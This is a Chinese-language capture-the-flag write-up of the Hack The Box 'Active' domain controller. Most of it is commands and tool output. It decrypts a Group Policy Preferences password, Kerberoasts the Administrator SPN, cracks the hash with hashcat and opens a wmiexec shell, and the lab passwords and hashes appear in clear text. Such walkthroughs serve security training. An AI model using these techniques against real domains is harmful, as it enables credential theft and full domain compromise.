HTB打靶(Active Directory 101 Active)

nmap扫描

Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-29 01:22 EST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 01:22 (0:00:00 remaining)
Stats: 0:01:16 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 55.56% done; ETC: 01:24 (0:00:39 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.61s latency).
Not shown: 982 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-29 06:23:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49176/tcp open  msrpc         Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=12/29%OT=53%CT=1%CU=40276%PV=Y%DS=2%DC=T%G=Y%TM=63AD32
OS:EC%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=O%TS=
OS:7)OPS(O1=M537NW8ST11%O2=M537NW8ST11%O3=M537NW8NNT11%O4=M537NW8ST11%O5=M5
OS:37NW8ST11%O6=M537ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M537NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-12-29T06:24:49
|_  start_date: 2022-12-29T06:19:26
| smb2-security-mode:
|   2.1:
|_    Message signing enabled and required

TRACEROUTE (using port 3306/tcp)
HOP RTT       ADDRESS
1   401.01 ms 10.10.16.1
2   794.14 ms 10.10.10.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.71 seconds
发现目标机器开启了SMB并且开启了消息签名防止了SMB relay攻击,尝试是否可以匿名访问SMB

使用smbclient进行匿名访问

    命令:smbclient -L //10.10.10.100
        Password for [WORKGROUP\kali]:
        Anonymous login successful

                Sharename       Type      Comment
                ---------       ----      -------
                ADMIN$          Disk      Remote Admin
                C$              Disk      Default share
                IPC$            IPC       Remote IPC
                NETLOGON        Disk      Logon server share
                Replication     Disk
                SYSVOL          Disk      Logon server share
                Users           Disk
        Reconnecting with SMB1 for workgroup listing.
        do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
        Unable to connect with SMB1 -- no workgroup available
    可以进行匿名访问并且发现SYSVOL,在大多数情况下，SYSVOL目录包含凭据：groups.xml，scheduledtasks.xml和＆Services.xml，Printers.xml ，Drives.xml,
    groups.xml只有创建组策略脚本登录才能有策略脚本配置文件,查看是否存在该文件获取脚本登录账号密码登录。
    smbclient   //10.10.10.100/Replication
    Password for [WORKGROUP\kali]:
    Anonymous login successful
    Try "help" to get a list of possible commands.
    smb: \> RECURSE ON
    smb: \> PROMPT OFF
    smb: \> mget *
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (0.9 KiloBytes/sec) (average 0.3 KiloBytes/sec)
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
    getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (0.8 KiloBytes/sec) (average 0.4 KiloBytes/sec)
    getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (1.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
    smb: \>
    发现:Groups.xml文件存在组策略登录脚本
    也可以在\active.htb\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\发现Groups.xml 中找到该文件
    smb shell:
    get Groups.xml 可以进行下载

使用gpp-decrypt解密Groups.xml

Groups.xml内容:
    <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
    </User>
    </Groups>
 gpp-decrypt解密:   
    gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ   
    明文密码:GPPstillStandingStrong2k18

 获得账号密码
    user:active.htb\SVC_TGS
    password:GPPstillStandingStrong2k18

获取user flag

smbclient //10.10.10.100/Users -U SVC_TGS
flag位置:\SVC_TGS\Desktop\user.txt

使用ldapsearch或者GetUserSPNs.py查询SPN

ldapsearch:
    ldapsearch -x -H ldap://10.10.10.100 -D 'SVC_TGS' -w 'GPPstillStandingStrong2k18' -b 'dc=active,dc=htb' -s sub "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" servicePrincipalName
回显:
    # extended LDIF
    #
    # LDAPv3
    # base <dc=active,dc=htb> with scope subtree
    # filter: (&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))
    # requesting: servicePrincipalName
    #

    # Administrator, Users, active.htb
    dn: CN=Administrator,CN=Users,DC=active,DC=htb
    servicePrincipalName: active/CIFS:445

    # krbtgt, Users, active.htb
    dn: CN=krbtgt,CN=Users,DC=active,DC=htb
    servicePrincipalName: kadmin/changepw

    # search reference
    ref: ldap://ForestDnsZones.active.htb/DC=ForestDnsZones,DC=active,DC=htb

    # search reference
    ref: ldap://DomainDnsZones.active.htb/DC=DomainDnsZones,DC=active,DC=htb

    # search reference
    ref: ldap://active.htb/CN=Configuration,DC=active,DC=htb

    # search result
    search: 2
    result: 0 Success

    # numResponses: 6
    # numEntries: 2
    # numReferences: 3
    重点: servicePrincipalName: active/CIFS:445,可以看到administrator配置了SPN可以尝试进行Kerberoasting攻击

GetUserSPNs.py 查询
命令:python3 GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-12-29 01:20:27.010143
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$9e62f2d972f0d970fefb01926fa36906$e92a510697739ade8c64475c527fbc50899330be417cefb3e193113a26a52befde837ca0c4d22df122e6ccff66d3f37d18f2fe325b7f26e201d0137029a97cee3a8b160c7d003099dbcd84487a6a4c4b0bd9e85746da8972d0bf007bf287feed1b9b3a1dfee1a83e41e34161c940db99a7bec6ea6d397cf79b65aeacbd2add152c8b1fd55280c790d77df44843e182536fbea432c4491d1493f11f2608d7d4b824e70c230039606e2f3a03c3efaf7313c37e88daac3674dc5690246e63d20f9076accb63f42e64c184c9c2b41f6eebc1ff4b591f73e1ac7667acd086c590bdce5ef5f3ac4aecc62e8481a4e4ba8e9b9b8d3da767638957336c6ef649c1a32fef279bde6c32f7e101ada45059985e2e3998ead3ff3df5dd7a83cc9da757e093b2143ae893ff4acb8f1d4f28addf0926d5d8dcbb1be70a56bf79c307fa7a8fcfc8b9c3d8eaa4bea5608621fef9039bfb73681d434e0663cf54a38659763ae7adc75125e127fad67d29d04bba43ee3de091f70a55b2fb7576e000cf3b7bbad8052e87da66dc30f797fc5e11d46a76ecf449c445365fe3a5082a4d015dda114cd408ad205f6c336c3671eb60779eab57418fffb59e9dd14b45c4e77491a72ea5e09e21685de2aa0b7952cd03abf47defe08b35f9aa1dc161f0b8d23a1ec76cabeda03a0b1a6cded15aef7273516995d253729e9e5abec19a0d31e27c612746fcd62fc416f87c366c64e755d0749164bc62c27d94163e0e06bf39a9b6ef5d4f417ba3c06f7d1b3f3f6e25ed164cc4647748065e82b371f59e33d94b1136ed71adad1b28c8e623fb689523870e3eea6c0c92837d16f8c57f3306373966b8ae631296be7d4ddb140b656e5a4a9ecdde52747ace0c040a32786ddac9fdf22cbbe52ab5977b4ba29270842ba5d6f5efbef1103272c0e4eea6c306b72a19fbcf933dbf5e3ecb6fa37333886f10617254f6615faff728da9df4b863ef9c5f2fcef34912089009671c4cce04c18bfbb05ef234892125632b6e7c4b47f44fc007d326974bfbb5bfb522ed16cbf4e89f974741bf4c9011e0ad0db40973fab0662cb32ffbcf4c08d2082e868835a625ffc7c5199765dfe41cac0c95c2f9d14cb04cda62858b812455373f7da00da51bae5e52941ce7df5a65af469884fe1692e687fd876a00230be9ba80c8b1156466c6c09f9a2f57439ef4aacbcac023eb1a1389eaf88e7214591c9cfe6acfa61610c14a8f7d63940f42788b62392f0a4f20fdea

使用hashcat破解NTLM hash

hash.txt:
    $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8452d42ef91379f18766c6dad496e2ad$978f014baa77f93b985b69d
    e9216daccd92dc9dc15bf15a61bb912374fea08591b63bfaba6480cb4ed57f6b65ddf9d94de2df5b2dd1e003c1e495fb0cbe9b71abd14c98d423f777
    0dd4f9cb7fedea9b6e7f8c026cabb86b2cb3a6f8f9282e136863d11fc735ed2feface81caaf3d708338a978ed77426e133dbe22a3139af3f47f4070b
    3e10116c588d483dd21582c1b2422c83cc44f14fe295ff2dd9a4824f0cdd6ec46d850f3dab4cc465947c450e355a91dc9cf506e2d9cc609465fdc71b
    4ef8215b41546572f2a82e0f9739120347b7fd44d15578230abd6971a5dd62d930b2ef416ee2a78eb851def6a8ccef6ff449c43e186dbff0416ca3f4
    44f574a7e096e431216dff19c8e76cae4800bc7374c3284fd218e06a31b22ded00be1ba322edd62d9bbd44e18bc0b2aa1ed5a9b3d7bbabf5606878cb
    cd1acecf625cf7b4a5d8979bfe9646ec2702ec873327c999ab65d121800a8b696b53654af069d73312360f29dd4d806ea457ebcce2d966495cd039b2
    4fa59f959e42f1c6f1420718c4ca8ad19a1d71f823252b360fc50e21e05474d73bd708594b22a8a0f95978609bf8b66109723e4591c1c3b17c18a61d
    5889d8b48eebbdbaa6b37116bebe8c52bae5dc9ea4bd94acf981cfc6ec05bc8d4897fd2e0497a3d8769c0efa9b43391ca710e7f8a40848ca2d0b8585
    f59cfbfc11c73ec8af4bb33b46a896b1b3043d34d2533e4bd656d84bbdd8367af47dc40a7bf40e33b252c51efa3c41f045ea066e816d5aaa821c2adb
    ba2d5ec6a93e68c800c1fe55cc096be2b5e7a152878f0c7c55a04b82de35a8775345cb08a4daae5965d6aa058b9fce8ef482b6a597aff06b825a057f
    35c1fc4c3dd9d003adf46f86193858170a626bbb924c11d4b2426f7589e7341336c21665c9cdc066416fcae657b5a13d9dbe0138c00c524397837fcb
    e1b60e46397a6888d7d772032c7d53a25d097fd1fbc3db6e6e27005760a6768e83b0849752c2ffee7b5165373c208d24b8c5d5e2b8308c731743a798
    f522d39a21c6faa9dfbf65851d7464b5ef2a5d8676fed0508251b4c95833d14b2ce15de17ad777c10dc89c7f0c6243f9a125a2433c8bb41f964e701e
    58e80928f82b254b9755aa34b9ba755d0e89bfa3089ebf95eea5625164432e11d4446f69bcf52e8df51e4a5726b6ef785ced8a8f6d6155068e18b68c
    28f0c3dd54638fa8ee391c5c5c986e03299d653f09f36c1d1f63b1b9eb2451d72c8f220b39dff
hashcat命令:
    hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt --force --potfile-disable    
               13100 是指(Kerberos 5, etype 23, TGS-REP)破解
 回显:
    hashcat (v6.2.5) starting

    You have enabled --force to bypass dangerous warnings and errors!
    This can hide serious problems and should only be done when debugging.
    Do not report hashcat issues encountered when using --force.

    OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
    =====================================================================================================================================
    * Device #1: pthread-12th Gen Intel(R) Core(TM) i5-12400F, 1428/2921 MB (512 MB allocatable), 4MCU

    Minimum password length supported by kernel: 0
    Maximum password length supported by kernel: 256

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
    Rules: 1

    Optimizers applied:
    * Zero-Byte
    * Not-Iterated
    * Single-Hash
    * Single-Salt

    ATTENTION! Pure (unoptimized) backend kernels selected.
    Pure kernels can crack longer passwords, but drastically reduce performance.
    If you want to switch to optimized kernels, append -O to your commandline.
    See the above message to find out about the exact limits.

    Watchdog: Temperature abort trigger set to 90c

    Host memory required for this attack: 0 MB

    Dictionary cache hit:
    * Filename..: /usr/share/wordlists/rockyou.txt
    * Passwords.: 14342306
    * Bytes.....: 139917341
    * Keyspace..: 14342306

    Cracking performance lower than expected?

    * Append -O to the commandline.
    This lowers the maximum supported password/salt length (usually down to 32).

    * Append -w 3 to the commandline.
    This can cause your screen to lag.

    * Append -S to the commandline.
    This has a drastic speed impact but can be better for specific attacks.
    Typical scenarios are a small wordlist but a large ruleset.

    * Update your backend API runtime / driver the right way:
    https://hashcat.net/faq/wrongdriver

    * Create more work items to make use of your parallelization power:
    https://hashcat.net/faq/morework

    $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8452d42ef91379f18766c6dad496e2ad$978f014baa77f93b985b69de9216daccd92dc9dc15bf15a61bb912374fea08591b63bfaba6480cb4ed57f6b65ddf9d94de2df5b2dd1e003c1e495fb0cbe9b71abd14c98d423f7770dd4f9cb7fedea9b6e7f8c026cabb86b2cb3a6f8f9282e136863d11fc735ed2feface81caaf3d708338a978ed77426e133dbe22a3139af3f47f4070b3e10116c588d483dd21582c1b2422c83cc44f14fe295ff2dd9a4824f0cdd6ec46d850f3dab4cc465947c450e355a91dc9cf506e2d9cc609465fdc71b4ef8215b41546572f2a82e0f9739120347b7fd44d15578230abd6971a5dd62d930b2ef416ee2a78eb851def6a8ccef6ff449c43e186dbff0416ca3f444f574a7e096e431216dff19c8e76cae4800bc7374c3284fd218e06a31b22ded00be1ba322edd62d9bbd44e18bc0b2aa1ed5a9b3d7bbabf5606878cbcd1acecf625cf7b4a5d8979bfe9646ec2702ec873327c999ab65d121800a8b696b53654af069d73312360f29dd4d806ea457ebcce2d966495cd039b24fa59f959e42f1c6f1420718c4ca8ad19a1d71f823252b360fc50e21e05474d73bd708594b22a8a0f95978609bf8b66109723e4591c1c3b17c18a61d5889d8b48eebbdbaa6b37116bebe8c52bae5dc9ea4bd94acf981cfc6ec05bc8d4897fd2e0497a3d8769c0efa9b43391ca710e7f8a40848ca2d0b8585f59cfbfc11c73ec8af4bb33b46a896b1b3043d34d2533e4bd656d84bbdd8367af47dc40a7bf40e33b252c51efa3c41f045ea066e816d5aaa821c2adbba2d5ec6a93e68c800c1fe55cc096be2b5e7a152878f0c7c55a04b82de35a8775345cb08a4daae5965d6aa058b9fce8ef482b6a597aff06b825a057f35c1fc4c3dd9d003adf46f86193858170a626bbb924c11d4b2426f7589e7341336c21665c9cdc066416fcae657b5a13d9dbe0138c00c524397837fcbe1b60e46397a6888d7d772032c7d53a25d097fd1fbc3db6e6e27005760a6768e83b0849752c2ffee7b5165373c208d24b8c5d5e2b8308c731743a798f522d39a21c6faa9dfbf65851d7464b5ef2a5d8676fed0508251b4c95833d14b2ce15de17ad777c10dc89c7f0c6243f9a125a2433c8bb41f964e701e58e80928f82b254b9755aa34b9ba755d0e89bfa3089ebf95eea5625164432e11d4446f69bcf52e8df51e4a5726b6ef785ced8a8f6d6155068e18b68c28f0c3dd54638fa8ee391c5c5c986e03299d653f09f36c1d1f63b1b9eb2451d72c8f220b39dff:Ticketmaster1968

    Session..........: hashcat
    Status...........: Cracked
    Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
    Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...b39dff
    Time.Started.....: Thu Dec 29 09:04:58 2022, (9 secs)
    Time.Estimated...: Thu Dec 29 09:05:07 2022, (0 secs)
    Kernel.Feature...: Pure Kernel
    Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
    Guess.Queue......: 1/1 (100.00%)
    Speed.#1.........:  1089.9 kH/s (0.47ms) @ Accel:256 Loops:1 Thr:1 Vec:8
    Recovered........: 1/1 (100.00%) Digests
    Progress.........: 10535936/14342306 (73.46%)
    Rejected.........: 0/10535936 (0.00%)
    Restore.Point....: 10534912/14342306 (73.45%)
    Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
    Candidate.Engine.: Device Generator
    Candidates.#1....: Tigerfeet70 -> TiAmoPanPeter1311
    Hardware.Mon.#1..: Util: 48%

    Started: Thu Dec 29 09:04:40 2022
    Stopped: Thu Dec 29 09:05:09 2022   

 获得账号密码
    active.htb/Administrator
    Ticketmaster1968

使用impacket wmiexec登录域控

cd impacket-impacket_0_9_22/examples
python3 wmiexec.py active.htb/Administrator:Ticketmaster1968@10.10.10.100
system flag
type C:\Users\Administrator\Desktop\root.txt

其他获取SPN的姿势

setspn.exe -T active.htb -F -Q */*

[*] SMBv2.1 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>setspn.exe -T active.htb -F -Q */*
Checking forest DC=active,DC=htb
CN=Administrator,CN=Users,DC=active,DC=htb
        active/CIFS:445
CN=DC,OU=Domain Controllers,DC=active,DC=htb
        ldap/DC.active.htb/ForestDnsZones.active.htb
        ldap/DC.active.htb/DomainDnsZones.active.htb
        TERMSRV/DC
        TERMSRV/DC.active.htb
        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC.active.htb
        DNS/DC.active.htb
        GC/DC.active.htb/active.htb
        RestrictedKrbHost/DC.active.htb
        RestrictedKrbHost/DC
        HOST/DC/ACTIVE
        HOST/DC.active.htb/ACTIVE
        HOST/DC
        HOST/DC.active.htb
        HOST/DC.active.htb/active.htb
        E3514235-4B06-11D1-AB04-00C04FC2DCD2/f4953ea5-0f30-4041-b4dd-1a00693a8510/active.htb
        ldap/DC/ACTIVE
        ldap/f4953ea5-0f30-4041-b4dd-1a00693a8510._msdcs.active.htb
        ldap/DC.active.htb/ACTIVE
        ldap/DC
        ldap/DC.active.htb
        ldap/DC.active.htb/active.htb
CN=krbtgt,CN=Users,DC=active,DC=htb
        kadmin/changepw

Existing SPN found!

导出administrator SPN
命令:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "active/CIFS:445"
Add-Type -Assembly "System.IO.Compression.FileSystem" [System.IO.Compression.ZipFile]::CreateFromDirectory("c:\temp\kirbi\","c:\temp\kirbi.zip")

使用kirbi2john.py 破解SPN TGS Hash 跟上面hashcat破解差不多
/opt/JohnTheRipper/run/kirbi2john.py
1-40a00000-svc_tgs@active~CIFS~445-ACTIVE.HTB.kirbi > hashes.txt
/opt/JohnTheRipper/run/john --format:krb5tgs hashes.txt
--wordlist=/usr/share/wordlists/rockyou.txt

简单说一下Kerberoasting攻击与KDC认证

KDC认证:
1.KRB_AS_REQ(request TGT)      ->             KDC
2.KRB_AS_REP(receive TGT)      <-             KDC
3.KRB_TGS_REQ(present TGT and request TGS) -> KDC
4.KRB_TGS_REP(receive TGS)     <-             KDC
5.KRB_AP_REP(present TGS for service access) -> Database Server(SPN:MSSQLSvc/SRVSQL01.CORP.LOCAL)Running in the context for domain service account "SVC-MSSQL"
讲解
KRB_AS_REQ(request TGT)
    将用户密码转换成NTLM hash,用它进行身份用户验证凭据（TGT)请求。
KPB_AS_REP(receive TGT)    
    DC (KDC)检查身份验证服务请求(AS REQ),检查用户信息并创建Ticket- granting Ticket (TGT),TGT被传递给用户(AS_REP)。
KRB_TGS_REQ(present TGT and request TGS)  
    当用户为特定的服务实例(TGS REQ)请求票据授予服务(TGS)票据时，用户向DC提交TGT,如果TGT通过了DC验证,它的数据将被复制以创建一个TGS票据。
KRB_TGS_REP(receive TGS)
    TGS使用运行服务实例的(业务计算机)帐户的密码散列NTLM加密，并传递给用户(TGS_REP)。
KRB_AP_REP(present TGS for service access)  
    用户向服务提供TGS,如果有效,则能够连接到服务实例(AP_REQ)
Kerberoasting攻击
    Kerberoasting针对是KRB_TGS_REP(receive TGS)这一步配置了SPN由服务账号的NTLM hash加密,kerberoating就是请求RC4加密的st然后尝试破解带有spn的用户账户,
    用户账户密码短破解有机会成功。

总结

使用nmap扫描目标发现是一台域控机器,尝试使用smbclient进行smb匿名访问发现成功,并且发现SYSVOL使用gpp-decrypt解密Groups.xml,
得到active.htb\SVC_TGS账号密码,使用GetUserSPNs.py查询SPN,看到administrator配置了SPN可以尝试进行Kerberoasting攻击,使用hashcat破解NTLM hash,
获得active.htb/Administrator账号密码使用wmiexec登录域控。
工具:
nmap
smbclient
gpp-decrypt
GetUserSPNs.py
ldapsearch
hashcat
wmiexec